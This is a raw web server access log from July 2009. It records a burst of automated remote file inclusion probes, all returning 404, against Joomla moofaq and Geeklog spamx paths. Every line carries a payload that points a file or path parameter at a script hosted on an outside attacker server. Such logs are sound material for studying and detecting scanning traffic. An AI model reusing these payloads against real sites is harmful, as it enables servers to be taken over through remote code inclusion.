174.133.150.130 - - [13/Jul/2009:01:56:54 -0400] "GET /_SERVER[DOCUMENT_ROOT]=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.820"
212.158.167.98 - - [13/Jul/2009:01:57:08 -0400] "GET //com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
202.174.82.220 - - [13/Jul/2009:01:57:18 -0400] "GET /logs/error_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
212.158.167.98 - - [13/Jul/2009:01:57:24 -0400] "GET /logs/access_log.Q109063000//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
207.182.133.50 - - [13/Jul/2009:01:57:36 -0400] "GET //com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.182.133.50 - - [13/Jul/2009:01:57:36 -0400] "GET /logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
207.182.133.50 - - [13/Jul/2009:01:57:36 -0400] "GET /logs/access_log.Q109062200//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
207.182.133.50 - - [13/Jul/2009:01:57:42 -0400] "GET /logs/access_log.Q109063000//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
174.133.150.130 - - [13/Jul/2009:01:58:08 -0400] "GET /rfihttp://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.820"
207.182.133.50 - - [13/Jul/2009:01:58:26 -0400] "GET /logs/access_log.Q109062200%20%20//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
207.182.133.50 - - [13/Jul/2009:01:58:26 -0400] "GET /logs/access_log.Q109063000%20%20//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
